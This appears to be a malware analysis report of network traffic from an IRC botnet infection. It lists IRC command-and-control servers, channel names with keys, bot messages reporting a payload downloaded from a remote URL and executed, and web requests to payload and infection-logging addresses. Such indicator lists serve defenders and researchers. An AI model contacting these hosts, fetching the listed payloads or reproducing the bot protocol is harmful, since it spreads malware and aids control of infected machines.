Remote Host Port Number
199.15.234.7 80
64.62.181.43 80
65.254.248.151 80
46.105.241.160 6667 PASS none or PASS passwd
MODE New{US-XP-x86}8220715 +iMm
JOIN #xxARYANxx# styggen
JOIN #dl
PRIVMSG #dl :[AryaN]: Downloading File: “http://ohnull.fileave.com/worm_crypt.exe”
PRIVMSG #dl :[AryaN]: Successfully Downloaded File To: “C:Documents and SettingsUserNameApplication Data187831163825520.exe”
PRIVMSG #dl :[AryaN]: Successfully Executed Process: “C:Documents and SettingsUserNameApplication Data187831163825520.exe”
NICK New{US-XP-x86}8220715
USER 8220715 “” “8220715” :8220715
NICK New{US-XP-x86}1124207
USER 1124207 “” “1124207” :1124207
MODE New{US-XP-x86}1124207 +iMmx
JOIN #a secret
PONG :asldfj.servmenow
NICK n{US|XPa}zfsweqj
USER zfsweqj 0 0 :zfsweqj
JOIN #ngr ngrBot
The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://ohnull.fileave.com/fudaryan.exe
http://ohnull.fileave.com/worm_crypt.exe
http://propcworx.com/icons/worm.php?logdata=Downloaded%20payload
http://propcworx.com/icons/worm.php?logdata=Executed%20payload
http://propcworx.com/icons/worm.php?logdata=Infected
http://propcworx.com/icons/worm.php?logdata=RAR%20archives%20infected
hosting infos:
http://whois.domaintools.com/46.105.241.160